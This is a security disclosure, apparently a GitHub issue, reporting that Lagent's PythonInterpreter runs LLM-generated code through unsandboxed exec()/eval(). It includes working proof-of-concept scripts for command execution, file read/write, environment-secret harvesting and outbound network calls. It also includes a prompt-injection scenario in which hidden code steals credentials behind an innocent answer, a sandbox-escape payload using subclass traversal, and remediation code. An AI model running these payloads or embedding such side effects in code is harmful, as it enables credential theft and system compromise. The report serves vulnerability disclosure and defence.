
Arbitrary Code Execution via Unsandboxed exec()/eval() in PythonInterpreter #312

@LQxdu

Description


Summary

Lagent's PythonInterpreter action executes LLM-generated code via exec() and eval() with no sandboxing, allowing arbitrary code execution: OS command execution, arbitrary file read/write, credential exfiltration, and full system compromise.

Details

Vulnerable Code

GenericRuntime class — the execution engine with no restrictions:

import copy
from typing import Any

class GenericRuntime:
    GLOBAL_DICT = {}
    LOCAL_DICT = None
    HEADERS = []

    def __init__(self):
        self._global_vars = copy.copy(self.GLOBAL_DICT)  # empty dict {}
        self._local_vars = copy.copy(self.LOCAL_DICT) if self.LOCAL_DICT else None

        for c in self.HEADERS:
            self.exec_code(c)

    def exec_code(self, code_piece: str) -> None:
        exec(code_piece, self._global_vars)   # ← SINK: arbitrary code execution

    def eval_code(self, expr: str) -> Any:
        return eval(expr, self._global_vars)  # ← SINK: arbitrary expression evaluation

PythonInterpreter._call() — the entry point that feeds LLM output to exec():

def _call(self, command: str) -> ActionReturn:
    tool_return = ActionReturn(type=self.name)
    try:
        # Extract code from markdown format
        if '```python' in command:
            command = command.split('```python')[1].split('```')[0]
        elif '```' in command:
            command = command.split('```')[1].split('```')[0]
        
        command = command.split('\n')

        if self.answer_from_stdout:
            # ... redirect stdout, then:
            self.runtime.exec_code('\n'.join(command))    # ← exec() called
        elif self.answer_symbol:
            self.runtime.exec_code('\n'.join(command))    # ← exec() called
        elif self.answer_expr:
            self.runtime.exec_code('\n'.join(command))    # ← exec() called
            res = self.runtime.eval_code(self.answer_expr) # ← eval() called
        else:
            self.runtime.exec_code('\n'.join(command[:-1])) # ← exec() called
            res = self.runtime.eval_code(command[-1])       # ← eval() called
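The markdown-stripping step can be reproduced in isolation. A minimal sketch (extract_code is a hypothetical helper mirroring the splitting logic in _call(), not part of lagent) shows that whatever sits inside a ```python fence reaches exec() verbatim:

```python
FENCE = '`' * 3  # literal triple backtick, built programmatically to avoid nested fences

def extract_code(command: str) -> str:
    # Mirrors PythonInterpreter._call(): keep everything between the
    # first ```python (or bare ```) fence pair, no validation at all.
    if FENCE + 'python' in command:
        command = command.split(FENCE + 'python')[1].split(FENCE)[0]
    elif FENCE in command:
        command = command.split(FENCE)[1].split(FENCE)[0]
    return command

llm_output = f"{FENCE}python\nimport os\nprint('pwned')\n{FENCE}"
assert extract_code(llm_output) == "\nimport os\nprint('pwned')\n"
```

Nothing between extraction and execution inspects or filters the payload.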

Data Flow

LLM Response (potentially influenced by prompt injection)
    ↓
PythonInterpreter.run(command: str)          # Public API, decorated with @tool_api
    ↓
PythonInterpreter._call(command)              # Extracts code from markdown ```python blocks
    ↓
GenericRuntime.exec_code(code_piece)          # exec(code_piece, self._global_vars)
    ↓
Arbitrary Python code execution               # Full __builtins__ access, import allowed
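The last step of the flow, full __builtins__ access, is easy to confirm: CPython injects the complete builtins module into any globals mapping passed to exec() that lacks the key. A minimal self-contained check:

```python
g = {}  # same shape as GenericRuntime.GLOBAL_DICT
exec("x = 1", g)
# CPython auto-injected the full builtins module into the empty dict:
assert '__builtins__' in g
# So __import__ is reachable and arbitrary imports succeed:
exec("import os; pid = os.getpid()", g)
assert isinstance(g['pid'], int)
```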

Proof of Concept

Environment Setup

pip install lagent  # tested with v0.2.4

PoC 1: OS Command Execution (RCE)

from lagent.actions.python_interpreter import PythonInterpreter

interpreter = PythonInterpreter(answer_from_stdout=True)
result = interpreter.run('import os; print("RCE_PROOF:" + os.popen("whoami").read().strip())')
print(result.result)
# Output: [{'type': 'text', 'content': 'RCE_PROOF:username\n'}]

Verified output:

Result: [{'type': 'text', 'content': 'RCE_PROOF:Zhuohao Zhang\n'}]

PoC 2: Arbitrary File Read

from lagent.actions.python_interpreter import PythonInterpreter

interpreter = PythonInterpreter(answer_from_stdout=True)
result = interpreter.run('print("FILE_READ:" + open("config/config.properties").readline().strip())')
print(result.result)
# Output: [{'type': 'text', 'content': 'FILE_READ:withAllJdk = false\n'}]

PoC 3: Direct GenericRuntime Exploitation

from lagent.actions.python_interpreter import GenericRuntime

rt = GenericRuntime()
rt.exec_code('import os')
username = rt.eval_code('os.popen("whoami").read().strip()')
print(username)  # Outputs current username

PoC 4: Arbitrary Directory & File Creation (persistent write)

from lagent.actions.python_interpreter import PythonInterpreter

interpreter = PythonInterpreter(answer_from_stdout=True)
result = interpreter.run('''
import os
os.makedirs("poc_proof_lagent", exist_ok=True)
with open("poc_proof_lagent/pwned.txt", "w") as f:
    f.write("RCE proof - arbitrary file write via Lagent")
print("DIR_EXISTS:" + str(os.path.exists("poc_proof_lagent/pwned.txt")))
''')
print(result.result)
# Output: [{'type': 'text', 'content': 'DIR_EXISTS:True\n'}]

Verified: Directory poc_proof_lagent/ created, file pwned.txt written to disk.

PoC 5: Environment Variable Exfiltration (credential theft)

from lagent.actions.python_interpreter import PythonInterpreter

interpreter = PythonInterpreter(answer_from_stdout=True)
result = interpreter.run('''
import os
secrets = {k: v for k, v in os.environ.items()
           if any(x in k.lower() for x in ["key", "token", "secret", "pass", "api"])}
print("SECRETS:" + str(list(secrets.keys())))
''')
print(result.result)
# Output: [{'type': 'text', 'content': "SECRETS:['AWS_BEARER_TOKEN_BEDROCK']\n"}]

Verified: Extracted AWS_BEARER_TOKEN_BEDROCK from environment — real cloud credential exposed.

PoC 6: Network Access & Outbound HTTP (data exfiltration / C2 callback)

from lagent.actions.python_interpreter import PythonInterpreter

interpreter = PythonInterpreter(answer_from_stdout=True)

# Step 1: Prove network access — leak internal IP
result1 = interpreter.run('''
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
print("INTERNAL_IP:" + s.getsockname()[0])
s.close()
''')
print(result1.result)
# Output: [{'type': 'text', 'content': 'INTERNAL_IP:10.203.141.241\n'}]

# Step 2: Prove outbound HTTP — attacker could exfiltrate data to webhook
result2 = PythonInterpreter(answer_from_stdout=True).run('''
import urllib.request
resp = urllib.request.urlopen("https://httpbin.org/get")
print("HTTP_STATUS:" + str(resp.status))
''')
print(result2.result)
# Output: [{'type': 'text', 'content': 'HTTP_STATUS:200\n'}]

Verified: Internal IP 10.203.141.241 leaked; outbound HTTP requests succeed — attacker could POST stolen credentials to an external server.

PoC 7: Realistic Attack — LLM Generates Malicious solution()

This is the most realistic scenario: the default PythonInterpreter expects the LLM to output a solution() function. An attacker uses prompt injection to make the LLM embed malicious code inside the expected format.

from lagent.actions.python_interpreter import PythonInterpreter

# Default config: answer_expr='solution()'
interpreter = PythonInterpreter()

# LLM sends markdown code block with solution() — exactly as designed
# But the code contains malicious side effects before returning
malicious_llm_output = """```python
import os
# Side-effect: exfiltrate env vars before returning "innocent" answer
secrets = str({k: v for k, v in os.environ.items() if "TOKEN" in k or "KEY" in k})
with open("/tmp/exfil.txt", "w") as f:
    f.write(secrets)
def solution():
    return "The answer is 42"
```"""

result = interpreter.run(malicious_llm_output)
print(result.result)
# Output: [{'type': 'text', 'content': 'The answer is 42'}]
# But /tmp/exfil.txt now contains stolen credentials

Key insight: The malicious code runs silently during exec() before solution() is called. The user sees a normal-looking answer while their credentials are stolen in the background.
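The timing claim, that side effects fire during exec() before eval('solution()') ever runs, can be verified without lagent. Here `marker` is a harmless stand-in for the credential write:

```python
code = (
    "marker = []\n"
    "marker.append('side effect ran at exec time')\n"
    "def solution():\n"
    "    return 'The answer is 42'\n"
)
g = {}
exec(code, g)                   # side effect fires here, before any call
assert g['marker'] == ['side effect ran at exec time']
answer = eval('solution()', g)  # the 'innocent' answer comes second
assert answer == 'The answer is 42'
```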

Root Cause Analysis

Core Issue

The fundamental issue is using Python's exec() and eval() built-in functions to execute untrusted code without any form of sandboxing or restriction. The code passes an empty globals dict {} to these functions, which does not restrict execution — Python automatically injects __builtins__ into any globals dict that doesn't explicitly contain it.

Why Empty Globals Is Not a Defense

# This is NOT sandboxed:
exec("__import__('os').system('id')", {})  # Works — __builtins__ auto-injected

# Even stripping builtins is exploitable:
exec("__import__('os').system('id')", {"__builtins__": {}})  # Blocked, but...
# attackers can recover dangerous classes via subclass traversal:
exec("[c for c in ().__class__.__base__.__subclasses__() if c.__name__=='Popen'][0](['id'])", {"__builtins__": {}})
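A harmless variant of the same traversal shows why: even with __builtins__ replaced by an empty dict, the object graph reachable from a bare tuple literal still exposes every class loaded in the process (the Popen gadget above additionally requires subprocess to have been imported somewhere):

```python
g = {'__builtins__': {}}
# No builtins available, yet the class hierarchy is fully reachable:
exec("classes = ().__class__.__base__.__subclasses__()", g)
names = [c.__name__ for c in g['classes']]
assert len(names) > 0      # many classes recovered from "nothing"
assert 'tuple' in names    # direct subclasses of object are all listed
```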

Remediation

Recommended Fix: Subprocess Isolation

The most robust fix is to execute the code in an isolated subprocess with a minimal environment (ideally inside a container or seccomp sandbox as well):

import os
import subprocess
import sys
import tempfile

class SecureRuntime:
    def __init__(self, timeout=20):
        self.timeout = timeout

    def exec_code(self, code_piece: str) -> str:
        fd, path = tempfile.mkstemp(suffix='.py')
        try:
            with os.fdopen(fd, 'w') as f:
                f.write(code_piece)
            result = subprocess.run(
                [sys.executable, path],  # absolute path; bare 'python' would not resolve with PATH=''
                capture_output=True,
                text=True,
                timeout=self.timeout,
                # Minimal environment: no PATH lookup, HOME pointed at tempdir.
                # Note: this alone does not block network access; pair it with
                # container/firewall-level isolation for that.
                env={
                    'PATH': '',
                    'HOME': tempfile.gettempdir(),
                },
            )
            return result.stdout
        finally:
            os.unlink(path)
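A usage sketch of the same idea, trimmed to its essentials: the untrusted code runs in a child interpreter launched via sys.executable, so the parent process is never exposed to exec()/eval():

```python
import os
import subprocess
import sys
import tempfile

def run_isolated(code: str, timeout: int = 20) -> str:
    # Write the untrusted code to a throwaway file and run it in a
    # separate Python process with a stripped-down environment.
    fd, path = tempfile.mkstemp(suffix='.py')
    try:
        with os.fdopen(fd, 'w') as f:
            f.write(code)
        result = subprocess.run(
            [sys.executable, path],  # absolute path: survives an empty PATH
            capture_output=True, text=True, timeout=timeout,
            env={'PATH': '', 'HOME': tempfile.gettempdir()},
        )
        return result.stdout
    finally:
        os.unlink(path)

print(run_isolated("print(6 * 7)"))
```

A crash or infinite loop in the payload now kills only the child process; the timeout bounds execution and the parent just reads captured stdout.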

Alternative: RestrictedPython (Partial Mitigation)

from RestrictedPython import compile_restricted, safe_globals

class RestrictedRuntime:
    def exec_code(self, code_piece: str) -> None:
        byte_code = compile_restricted(code_piece, '<inline>', 'exec')
        exec(byte_code, safe_globals.copy())

Note: RestrictedPython itself has known bypasses (CVE-2023-37271, CVE-2023-41039), so subprocess isolation is preferred.

Minimum Fix: Strip __builtins__

At minimum, prevent direct __import__ access (though this is bypassable):

 def exec_code(self, code_piece: str) -> None:
-    exec(code_piece, self._global_vars)
+    restricted_globals = {**self._global_vars, '__builtins__': {
+        'print': print, 'range': range, 'len': len, 'int': int,
+        'float': float, 'str': str, 'list': list, 'dict': dict,
+        'True': True, 'False': False, 'None': None,
+    }}
+    exec(code_piece, restricted_globals)

Warning: Builtins restriction alone is insufficient — subclass traversal attacks can recover full access.
